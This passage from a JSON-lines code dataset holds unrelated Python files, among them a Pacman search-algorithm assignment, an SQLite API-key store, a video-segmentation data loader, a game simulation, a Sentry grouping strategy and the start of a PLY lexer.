except OSError:\n pass\n else:\n logger.debug('Обновление списка пользователей с сервера выполнено')\n self.possible_contacts_update()\n","sub_path":"app/client/client/add_contact.py","file_name":"add_contact.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"533894666","text":"#coding:utf-8\n \n \ndef script(s, player=None):\n from NaoQuest.objective import Objective\n from NaoCreator.setting import Setting\n if not player:\n Setting.error(\"Error in execution of post_script of objective \\\"planter\\\": player is None\")\n return\n if not s.completed:\n s.wait_for = False\n","sub_path":"Save Scenario/Prsensation/scripts/planter_post.py","file_name":"planter_post.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374332881","text":"import sqlite3\n\n\nclass UserApiKey(object):\n\n def __init__(self, db=None):\n if db:\n self.conn = sqlite3.connect(db)\n else:\n self.conn = sqlite3.connect('keys.db')\n\n def create_table(self):\n cur = self.conn.cursor()\n cur.execute('''CREATE TABLE keys (owner, userid, vcode)''')\n\n def add_key(self, owner, userid, vcode):\n cur = self.conn.cursor()\n cur.execute(\n '''INSERT INTO keys VALUES(?, ?, ?)''', (owner, userid, vcode))\n self.conn.commit()\n\n def get_keys(self, owner=None):\n cur = self.conn.cursor()\n out = []\n if owner:\n cur.execute(\n '''SELECT owner, userid, vcode FROM keys WHERE owner = ?''',\n (owner,))\n else:\n cur.execute('''SELECT owner, userid, vcode FROM keys''')\n for key in cur.fetchall():\n out.append({\n 'owner': key[0],\n 'userid': key[1],\n 'vcode': key[2]\n })\n return out\n\n def delete_key(self, owner, userid):\n cur = self.conn.cursor()\n cur.execute('''DELETE FROM keys WHERE owner=? AND userid=?''',\n (owner, userid))\n self.conn.commit()","sub_path":"source/UserApiKey.py","file_name":"UserApiKey.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624363862","text":"\n#--------------------------------------------------------------------------------\n\nfrom sklearn.externals import joblib\n\nscaler = StandardScaler().fit(unscaled_x)\nsvc = LinearSVC()\nsvc.fit(x_train, y_train)\n\njoblib.dump(svc, 'svc.pkl')\njoblib.dump(scaler, 'scaler.pkl')\n\nsvc = joblib.load('svc.pkl')\nscaler = joblib.load('scaler.pkl')\n\n#--------------------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\nfrom numpy import min, max \n\n# matplotlib.colors.Colormap documentation\n# colormap \n# - used to convert data values (floats) from the interval [0, 1] to the RGBA color\n# For normalization, you can use matplotlib.colors.Normalize instead\n\ndef hot_to_rgb(heatmap):\n\n min_value, max_value = min(heatmap), max(heatmap)\n normalized_heatmap = (heatmap - min_value) / (max_value - min_value)\n \n colormap = plt.cm.get_cmap('hot') \n rgba = colormap(normalized_heatmap) \n \n r, g, b = rgba[:, :, 0], rgba[:, :, 1], rgba[:, :, 2]\n rgb_img = np.dstack((r, g, b))\n \n return rgb_img\n\n#--------------------------------------------------------------------------------\n\nclass HeatMap:\n\n # memory: number of frames to keep \n # threshold: to weed out transient positives\n # frame: colored video frame (720, 1280, 3)\n # map, labeledmap, thresholded_map: 2d array (720, 1280)\n # box: tuple (x, y, s), topleft corner, side length\n # history: list of list. inner list contain boxes for the frame\n def __init__(self, frame, memory, thresh):\n \n self.blank = np.zeros_like(frame[:, :, 0]).astype(np.float)\n self.map = np.copy(self.blank)\n self.thresholded_map = None\n self.labeled_map = None\n self.samples_found = 0\n self.thresh = thresh\n self.memory = memory\n self.history = []\n\n def reset(self):\n self.map = np.copy(self.blank)\n self.history = []\n\n def do_threshold(self):\n self.thresholded_map = np.copy(self.map)\n self.thresholded_map[self.map < self.thresh] = 0\n \n def get(self):\n self.do_threshold()\n self.label()\n return self.map, self.thresholded_map, self.labeled_map\n \n def remove(self, boxes):\n for box in boxes: \n x1, y1, x2, y2 = box_boundaries(box) \n self.map[y1: y2, x1: x2] -= 1\n \n def add(self, boxes):\n for box in boxes: \n x1, y1, x2, y2 = box_boundaries(box)\n self.map[y1: y2, x1: x2] += 1\n\n def update(self, boxes):\n \n if len(self.history) == self.memory:\n self.remove(self.history[0]) # remove boxes of oldest frame from heatmap\n self.history = self.history[1:] # remove the boxes from history\n \n self.add(boxes) # add boxes to heatmap\n self.history.append(boxes)\n \n # check scipy.ndimage.measurements.label documentation\n # label > 2-tuple\n # item 1: the number of labels (cars) found\n # item 0: An \"image\", the size of the heatmap input image\n # each 'pixel' of 'car box' will be labeled as (1, 2, 3... respectively) in item 1\n def label(self):\n labeled = label(self.thresholded_map)\n self.samples_found = labeled[1]\n self.labeled_map = labeled[0]\n\n # draws a bounding box on the video frame\n def draw(self, frame, color = (0, 225, 0), thickness = 10):\n \n this_frame = frame.copy()\n \n # for each \"car box\" detected\n for n in range(1, self.samples_found + 1):\n \n # of that specific \"car box\", get all x and y pixel locations\n coords = (self.labeled_map == n).nonzero() \n xs, ys = np.array(coords[1]), np.array(coords[0]) \n \n # get upperleft corner and lowerleft corner \n p1 = (np.min(xs), np.min(ys)) \n p2 = (np.max(xs), np.max(ys))\n \n cv2.rectangle(this_frame, p1, p2, color, thickness)\n \n return this_frame\n","sub_path":"w4/sample_code.py","file_name":"sample_code.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"639328116","text":"from Line import Line\nfrom Station import Station\nfrom Train import Train\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom utils import totuple, get_rect, draw_ellipse, angle\n\nclass Game:\n def __init__(self, window_size):\n self.window_size = 1000\n self.margin = 50\n self.ticks = 0\n normal_speed = 0.05 * self.window_size\n self.trains = [\n Train(\"train 1\", normal_speed, 0, 1)\n # Train(\"train 1\", normal_speed, 0, 1), \n # Train(\"train 2\", normal_speed, 0, 1), \n # Train(\"train 3\", normal_speed, 0, 1), \n ]\n self.stations = [\n Station(\"station 1\", \"triangle\", self.spawn_xy()), \n Station(\"station 2\", \"square\", self.spawn_xy()),\n Station(\"station 3\", \"circle\", self.spawn_xy())\n ]\n\n self.lines = []\n self.available_special_types = [\"diamond\"]\n self.carriage_num = 0\n self.score = 0\n self.day = 0\n\n def spawn_xy(self):\n x = np.random.randint(self.margin, self.window_size-self.margin)\n y = np.random.randint(self.margin, self.window_size-self.margin)\n return np.array([x, y], dtype=np.float)\n \n def step(self):\n self.ticks += 1\n if self.ticks % 299 == 0:\n self.day += 1\n t1 = np.random.random()\n if t1 < 0.3:\n t2 = np.random.random()\n if t2 < 0.3:\n station_type = \"triangle\"\n elif t2 < 0.6:\n station_type = \"square\"\n elif t2 < 0.9:\n station_type = \"circle\"\n else:\n station_type = np.random.choice(self.available_special_types)\n new_station = Station(\"station \"+str(self.day+3), station_type, self.spawn_xy())\n self.stations.append(new_station)\n\n if self.ticks % 29 == 0:\n # populate stations\n for station in self.stations:\n if np.random.random() < 0.5:\n station.populate(self.available_special_types)\n \n for line in self.lines:\n for train in line.trains:\n if train.in_station:\n train.station.move_passengers()\n else:\n train.move()\n \n def draw(self):\n # draw background\n side = self.window_size\n line_width = int(0.01 * side)\n square_size = int(0.025 * side)\n triangle_size = int(0.05 * side)\n train_width = int(0.02 * side)\n train_height = int(0.06 * side)\n img = Image.new(mode='RGB', size=(side, side), color=(255, 255, 255))\n draw_img = ImageDraw.Draw(img)\n\n # draw lines\n for l in self.lines:\n line = []\n for s in l.stations:\n line.append(totuple(s.xy))\n draw_img.line(line, fill=(0, 0, 0), width=line_width)\n \n # draw stations\n for s in self.stations:\n if s.station_type == \"circle\":\n radius = 0.025 * side\n x0, y0 = s.xy\n x1 = x0 + radius\n y1 = y0 + radius\n # draw image\n draw_ellipse(draw=draw_img, bbox=[x0, y0, x1, y1], linewidth=line_width)\n else:\n if s.station_type == \"triangle\":\n L = triangle_size\n corners = np.array([[0, 0],\n [L, 0], \n [0.5 * L, 0.866 * L],\n [0, 0]])\n corners += s.xy\n elif s.station_type == \"square\":\n corners = get_rect(s.xy[0], s.xy[1], square_size, square_size, 0)\n elif s.station_type == \"diamond\": \n corners = get_rect(s.xy[0], s.xy[1], square_size, square_size, 90)\n\n # get tuple version of the points\n shape_tuple = totuple(corners)\n # draw image\n draw_img.polygon(xy=[tuple(p) for p in corners], fill=(255, 255, 255), outline=0)\n # draw line around polygon to adjust line width since polygon doesn't support it\n draw_img.line(xy=shape_tuple, fill=(0, 0, 0), width=line_width)\n \n # draw trains\n for t in self.trains:\n corners = get_rect(t.xy[0], t.xy[1], train_height, train_width, t.angle)\n # get tuple version of the points\n shape_tuple = totuple(corners)\n # draw image\n draw_img.polygon(xy=[tuple(p) for p in corners], fill=(0, 0, 0), outline=0)\n \n image = np.asarray(img)\n image = np.copy(image)\n image = image / 255.0\n\n return image","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"122972564","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n#\n#Code updated by Sumit Rawat (srawat7@asu.edu)\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\nfrom util import Queue\nimport numpy as np\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print \"Start:\", problem.getStartState()\n print \"Is the start a goal?\", problem.isGoalState(problem.getStartState())\n print \"Start's successors:\", problem.getSuccessors(problem.getStartState())\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\t\n stack = util.Stack()\t#fringe for DFS is a LIFO stack\n stack.push((curr_state, path))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state)\t#get successors\n \t\tfor (successor_state, next_direction, _) in successor_list:\n \t\t\tstack.push((successor_state, path + [next_direction]))\n \t(curr_state, path) = stack.pop()\n return path\n #util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n queue = util.Queue()\t#fringe for DFS is a FIFO queue\n queue.push((curr_state, path))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state) #get successors\n \t\tfor (successor_state, next_direction, _) in successor_list:\n \t\t\tqueue.push((successor_state, path + [next_direction]))\n \t(curr_state, path) = queue.pop()\n return path\n #util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n curr_cost = 0\n pQueue = util.PriorityQueue()\t#fringe for UCS is a Priority queue\n pQueue.push((curr_state, path, curr_cost), curr_cost)\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n \tif curr_state not in visited_states:\n \t\tvisited_states.add(curr_state)\t#mark state as visited\n \t\tsuccessor_list = problem.getSuccessors(curr_state)\t#get successors\n \t\tfor (successor_state, next_direction, additional_cost) in successor_list:\n \t\t\tpQueue.push((successor_state, path + [next_direction], curr_cost + additional_cost), curr_cost + additional_cost)\n \t(curr_state, path, curr_cost) = pQueue.pop()\n return path\n #util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef nullHeuristic_bi(position, problem, dir = 0, info={}):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided bidirectional SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n curr_state = problem.getStartState()\n visited_states = set()\t#to store the states already visited\n path = []\n curr_cost = 0\n pQueue = util.PriorityQueue()\t#fringe for A* is a Priority queue\n pQueue.push((curr_state, path, curr_cost), curr_cost + heuristic(curr_state, problem))\n while not problem.isGoalState(curr_state):\t#loop till we reach goal state\n if curr_state not in visited_states:\n visited_states.add(curr_state)\t#mark state as visited\n successor_list = problem.getSuccessors(curr_state)\t#get successors\n for (successor_state, next_direction, additional_cost) in successor_list:\n pQueue.push((successor_state, path + [next_direction], curr_cost + additional_cost), curr_cost + additional_cost + heuristic(successor_state, problem))\n (curr_state, path, curr_cost) = pQueue.pop()\n return path\n #util.raiseNotDefined()\n\n\ndef bidirectionalMMsearch(problem, heuristic=nullHeuristic):\n \"\"\"Implementation of bidirectional A* search that Meets in the Middle\n A search starts from the start node towards the goal node and another\n starts from teh goal node towards the start node. These searches meet in the middle\n and the cheapest solution is found.\n \"\"\"\n #start point of the forward search\n curr_state_fwd = problem.getStartState()\n # start point of the backward search\n curr_state_bck = problem.getGoalState()\n # Lists to store the actions followed for the forward and backward searches\n path_fwd = []\n path_bck = []\n # dictonaries for states and their g values in the forward and backward direction\n g_fwd = {curr_state_fwd: 0}\n g_bck = {curr_state_bck: 0}\n # open and closed lists in the forward and backward directions\n open_fwd = [(curr_state_fwd, path_fwd)]\n open_bck = [(curr_state_bck, path_bck)]\n closed_fwd = []\n closed_bck = []\n # U = Cost of the cheapest solution found so far\n U = np.inf\n\n def search_dir(U, open1, open2, g1, g2, closed, dir):\n \"Search in the direction dir\"\n n, path = min_p_g(C, open1, g1, dir)\n open1.remove((n, path))\n closed.append((n, path))\n successor_list = problem.getSuccessors(n)\n for (c, next_direction, additional_cost) in successor_list:\n if found(open1, c) or found(closed, c):\n if g1[c] <= g1[n] + additional_cost:\n continue\n\n open1 = delete(open1, c)\n\n g1[c] = g1[n] + additional_cost\n open1.append((c, path + [next_direction]))\n #visited_states.add(c)\n if found(open2, c):\n U = min(U, g1[c] + g2[c])\n\n return U, open1, closed, g1\n\n def delete(open1, n):\n \"\"\"Delete state n from Open list open1\"\"\"\n for (c, path) in open1:\n if c == n:\n open1.remove((c, path))\n return open1\n\n def found(open1, n):\n \"\"\"Check if the state n is on the Open list open1\"\"\"\n for (c, path) in open1:\n if c == n:\n return True\n return False\n\n def choose_min_n(open1, g, dir):\n \"\"\"Function to find the minimum values of f and g\n for the states in the open list in the current direction\"\"\"\n prmin, prmin_F = np.inf, np.inf\n for (n, path) in open1:\n f = g[n] + heuristic(n, problem, dir)\n pr = max(f, 2 * g[n])\n prmin = min(prmin, pr)\n prmin_F = min(prmin_F, f)\n\n return prmin, prmin_F, min(g.values())\n\n def min_p_g(prmin, open1, g, dir):\n \"\"\"find prmin and gmin in open list\"\"\"\n m = np.inf\n node = problem.goal\n final_path = []\n for (n, path) in open1:\n pr = max(g[n] + heuristic(n, problem, dir), 2 * g[n])\n if pr == prmin:\n if g[n] < m:\n m = g[n]\n node = n\n final_path = path\n\n return node, final_path\n\n def getPath(open_fwd, open_bck):\n \"\"\"Get the optimal forward and backward path\"\"\"\n for (nf, path_fwd) in open_fwd:\n for (nb, path_bck) in open_bck:\n if(nf == nb):\n return path_fwd, path_bck\n #If no nodes are found to be common\n print('No common node found #SR')\n\n\n def opposite(path):\n \"\"\"Reverse the directions in the given path. This is used for the path from\n the goal node to the start node\"\"\"\n reversed_path = []\n for i in path:\n # Convert NORTH to SOUTH\n if i == 'North':\n reversed_path.append('South')\n # Convert SOUTH to NORTH\n elif i == 'South':\n reversed_path.append('North')\n # Convert EAST to WEST\n elif i == 'East':\n reversed_path.append('West')\n # Convert WEST to EAST\n else:\n reversed_path.append('East')\n #print('\\n Path_bck = {0}'.format(j))\n return reversed_path\n\n #while the open lists are not empty\n while open_fwd and open_bck:\n prmin_F, fmin_fwd, gmin_fwd = choose_min_n(open_fwd, g_fwd, 0)\n prmin_b, fmin_bck, gmin_bck = choose_min_n(open_bck, g_bck, 1)\n C = min(prmin_F, prmin_b)\n\n if U <= max(C, fmin_fwd, fmin_bck, gmin_fwd + gmin_bck + 1):\n \"\"\"The condition that indicates that the optimal solution has been found.\n The cost of the cheapest edge in this problem is 1\"\"\"\n \"\"\"\n totalOpenNodes = len(open_fwd) + len(open_bck) + 1\n totalClosedNodes = len(closed_fwd) + len(closed_bck)\n print('\\nTotal nodes expanded = {0}'.format(totalOpenNodes + totalClosedNodes))\n print(' (open nodes = {0} and closed nodes = {1})'.format(totalOpenNodes, totalClosedNodes))\n \"\"\"\n print('\\nPath length = {0}'.format(U))\n path_fwd, path_bck = getPath(open_fwd, open_bck)\n #print('\\n path_bck = {0}'.format(path_bck))\n path_bck = reversed(path_bck)\n #print('\\n Path_fwd = {0}'.format(path_fwd))\n if path_bck:\n path_fwd= path_fwd + opposite(path_bck)\n problem.isGoalState(problem.getGoalState())\n return path_fwd\n\n if C == prmin_F:\n # Search in the forward direction\n U, open_fwd, closed_fwd, g_fwd = search_dir(U, open_fwd, open_bck, g_fwd, g_bck, closed_fwd, 0)\n else:\n # Search in the backward direction\n U, open_bck, closed_bck, g_bck = search_dir(U, open_bck, open_fwd, g_bck, g_fwd, closed_bck, 1)\n\n #Incase U never reaches the optimal value\n print('\\nPath length = infinity')\n return path_fwd\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\nmm = bidirectionalMMsearch\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":12998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"28973867","text":"#!/usr/bin/env python3\nimport sys\nfrom signal import signal, SIGPIPE, SIG_DFL\n\nsignal(SIGPIPE, SIG_DFL)\n\npunk = '.!?'\n\ndef is_well_formed(line):\n if len(line) < 31:\n return False\n\n x = line[0]\n if not x.isalpha() or not x.isupper():\n return False\n if not line[-2] in punk: # last character is '\\n'\n return False\n\n i = 0\n for c in line:\n if c.isalpha():\n i += 1\n if i == 30:\n return True\n return False\n\n\nif __name__ == '__main__':\n for line in sys.stdin:\n if is_well_formed(line):\n sys.stdout.write(line)\n","sub_path":"scripts/well-formed.py","file_name":"well-formed.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"645471185","text":"import pickle \nimport os\nimport numpy as np\nimport cv2\nfrom scipy.misc import imresize\nfrom util.helpers import *\nfrom torch.utils.data import Dataset\n\nclass DAVIS2016(Dataset):\n def __init__(self, root, split='train', img_size=(256, 512), transform=None):\n self.transform = transform\n self.img_size = img_size\n self.meanval = (104.00699, 116.66877, 122.67892)\n\n with open(root, 'rb') as fp:\n contents = pickle.load(fp)\n tmp = contents[split]\n self.data = tmp['images']\n self.label= tmp['labels']\n self.noseq= tmp['noseq']\n\n self.shape = self.data.shape\n\n def __getitem__(self, index):\n '''\n img, lbl= self.data[index], self.label[index]\n img = np.array(img, dtype=np.float32)\n img = np.subtract(img, np.array(self.meanval, dtype=np.float32))\n '''\n if index not in self.noseq:\n img1, lbl1= self.data[index] , self.label[index]\n img2, lbl2= self.data[index+1], self.label[index+1]\n img3, lbl3= self.data[index+2], self.label[index+2]\n else:\n img1, lbl1= self.data[index-2], self.label[index-2]\n img2, lbl2= self.data[index-1], self.label[index-1]\n img3, lbl3= self.data[index] , self.label[index]\n\n img1 = np.array(img1, dtype=np.float32)\n img1 = np.subtract(img1, np.array(self.meanval, dtype=np.float32))\n img2 = np.array(img2, dtype=np.float32)\n img2 = np.subtract(img2, np.array(self.meanval, dtype=np.float32))\n img3 = np.array(img3, dtype=np.float32)\n img3 = np.subtract(img3, np.array(self.meanval, dtype=np.float32))\n \n lbl1 = np.expand_dims(lbl1, axis=2)\n lbl2 = np.expand_dims(lbl2, axis=2)\n lbl3 = np.expand_dims(lbl3, axis=2)\n \n img = np.concatenate((img1,img2,img3),2)\n lbl = np.concatenate((lbl1,lbl2,lbl3),2)\n \n sample = {'image': img, 'gt': lbl}\n if self.transform is not None:\n sample = self.transform(sample)\n \n sample1 = {'image': sample['image'][0:3, :, :], 'gt': sample['gt'][0, :, :]}\n sample2 = {'image': sample['image'][3:6, :, :], 'gt': sample['gt'][1, :, :]}\n sample3 = {'image': sample['image'][6:9, :, :], 'gt': sample['gt'][2, :, :]}\n\n return sample1, sample2, sample3\n \n def __len__(self):\n return self.data.shape[0]\n\n","sub_path":"PSPNet/util/loader/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242711321","text":"'''Data structure storing local roles on every Appy object'''\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nfrom persistent.list import PersistentList\nfrom persistent.mapping import PersistentMapping\n\n# Errors - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nNO_LOGIN_OR_ROLE = 'Empty login or role.'\nNO_LOGIN_AND_ROLE = 'Empty login and role.'\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nclass LocalRoles(PersistentMapping):\n '''Dict-like data structure storing local roles on an Appy object'''\n\n # Dict has spec {s_login: [s_role]} and defines, for every user or group\n # login, the list of roles granted to him on the linked object.\n\n def __init__(self):\n PersistentMapping.__init__(self)\n # When boolean \"only\" is True, the workflow behaves differently: it only\n # checks local roles (and thus it ignores the user's global roles).\n # Read this attribute in the context of an object:\n # \"o.localRoles.only\"\n self.only = False\n\n def add(self, login, role, o=None):\n '''Grants to some p_login (or several if p_login is a list/tuple) a\n given local p_role (or several if p_role is a list/tuple). Returns\n the number of actually added local roles.'''\n\n # Security information for any object is indexed. So if the object being\n # modified is not the main object of a ui transaction (ie, not triggered\n # within m_onEdit), give it in p_o and security-related info on it will\n # be reindexed.\n\n if not login or not role: raise Exception(NO_LOGIN_OR_ROLE)\n r = 0\n # Standardise parameters\n login = (login,) if isinstance(login, str) else login\n role = (role,) if isinstance(role, str) else role\n # Browse logins to update\n for l in login:\n # Get or create the list of local roles for this login\n if l in self:\n roles = self[l]\n else:\n self[l] = roles = PersistentList()\n # Browse roles to grant\n for rol in role:\n if rol not in roles:\n roles.append(rol)\n r += 1\n # Reindex the security-related index on p_o if required\n if o: o.reindex(fields=('Allowed',))\n return r\n\n def delete(self, login=None, role=None, o=None):\n '''Ungrants, for a given p_login, some local p_role. Returns the number\n of actually deleted local roles.'''\n\n # If p_login is None, is ungrants p_role for every login mentioned in\n # local roles. If p_login is a list/tuple, it ungrants p_role to those\n # p_logins.\n\n # If p_role is None, it ungrants all previously granted roles to\n # p_login. If p_role is a list/tuple, if ungrants those roles to\n # p_login.\n\n # For parameter p_o, same remark as for m_add.\n\n if not login and not role: raise Exception(NO_LOGIN_AND_ROLE)\n r = 0\n if not role:\n # Ungrant to p_login every previously granted role\n if isinstance(login, str): login = (login,)\n for l in login:\n if l in self:\n del(self[l])\n r += 1\n else:\n # To what login(s) must we ungrant p_role(s) ?\n if not login:\n # To anyone having local roles on this object\n login = list(self.keys())\n # Else: to the login(s) specified in p_login\n elif isinstance(login, str): login = (login,)\n # Ungrant roles\n if isinstance(role, str): role = (role,)\n for l in login:\n if l not in self: continue\n roles = self[l]\n for rol in role:\n if rol in roles:\n roles.remove(rol)\n r += 1\n # Remove the entry if no more role is granted to this login\n if not roles:\n del(self[l])\n # Reindex the security-related index if required\n if o: o.reindex(fields=('Allowed',))\n return r\n\n def reset(self, o=None):\n '''Removes all local roles stored on p_self. If p_o is given, local role\n \"Owner\" is granted to p_o's creator.'''\n self.clear()\n if o: self.add(o.creator, 'Owner')\n\n def getLoginsHaving(self, role):\n '''Gets all logins having local p_role on this object'''\n r = set()\n for login, roles in self.items():\n if role in roles:\n r.add(login)\n return r\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n","sub_path":"appy/model/workflow/localRoles.py","file_name":"localRoles.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"36401027","text":"# -*- coding: utf-8 -*-\r\ndata = {'s1': {'name': 'haifeng', 'age': 17, 'grade': 1, 'class': 3}}\r\n\r\nimport yaml\r\n\r\nyaml.dump(data, default_flow_style=False)\r\ndef parse_dict(d1, layer=0):\r\n msg_text = \"\"\r\n print('d1', d1)\r\n for k, v in d1.items():\r\n print('d1 k: ' + k + ', d1 v: %s' % v) \r\n print('*'*30, 'layer', layer)\r\n if type(v) == dict:\r\n self_layer=layer+2\r\n inner_msg = parse_dict(v, layer=self_layer) \r\n inner_msg.replace('\\n', '\\n' + ' ' * self_layer)\r\n msg_text = msg_text + inner_msg\r\n #return msg_text\r\n else:\r\n if type(v) == int:\r\n #print 'str(v)', v\r\n v = str(v)\r\n\r\n if v == None:\r\n v = \"none\"\r\n #print \"v = none\", v\r\n \r\n if v == True:\r\n v = 'True'\r\n \r\n if v == False:\r\n v = 'False'\r\n\r\n #print \"k:\" ,k ,\"v: \",v\r\n msg_text = msg_text + k + \": \" + v +'\\n'\r\n\r\n return msg_text\r\n \r\n\r\ndef parse_data(d1, layer=0):\r\n msg_text=\"\"\r\n for k,v in d1.items():\r\n msg_text = msg_text + k +'\\n'\r\n return msg_text\r\n \r\n#print '*'*0\r\n#data= item_dict(data)\r\n#data= parse_dict(data['s1'])\r\ndata= parse_dict(data)\r\nprint('-'*30)\r\nprint(data)\r\n","sub_path":"beyond/liaoxuefeng/dict_recursive/dict_recursive_1.py","file_name":"dict_recursive_1.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"648439576","text":"from sentry.grouping.component import GroupingComponent\nfrom sentry.grouping.strategies.base import strategy, produces_variants\n\n\n@strategy(id=\"template:v1\", interfaces=[\"template\"], score=1100)\n@produces_variants([\"default\"])\ndef template_v1(template, context, **meta):\n filename_component = GroupingComponent(id=\"filename\")\n if template.filename is not None:\n filename_component.update(values=[template.filename])\n\n context_line_component = GroupingComponent(id=\"context-line\")\n if template.context_line is not None:\n context_line_component.update(values=[template.context_line])\n\n return {\n context[\"variant\"]: GroupingComponent(\n id=\"template\", values=[filename_component, context_line_component]\n )\n }\n","sub_path":"src/sentry/grouping/strategies/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"362828947","text":"import re\nimport ply.lex\n\nR_HEX_ESC = re.compile(r\"\\\\x([a-fA-F0-9]{2})\")\ndef r_hex_esc(m):\n return chr(int(m.group(1), 16))\n\ndef sub_escs(s):\n return R_HEX_ESC.sub(s.replace(\"\\\\n\", \"\\n\").replace(\"\\\\r\", \"\\r\").replace(\"\\\\t\", \"\\t\"), r_hex_esc)\n\nregisters = [\n \"v0\", \"v1\", \"v2\", \"v3\", \"v4\", \"v5\", \"v6\", \"v7\",\n \"a0\", \"a1\", \"a2\", \"a3\", \"q0\", \"q1\", \"sp\", \"\",\n]\n\ntokens = [\n \"COLON\",\n \"COMMA\",\n \"IDENTIFIER\",\n \"INTEGER\",\n \"LBRACKET\",\n \"NEWLINE\",\n \"RBRACKET\",\n \"REGISTER\",\n \"STRING\",\n]\n\nt_COLON = r\":\"\nt_COMMA = r\",\"\nt_IDENTIFIER = r\"[._a-zA-Z][._a-zA-Z0-9]*\"\nt_LBRACKET = 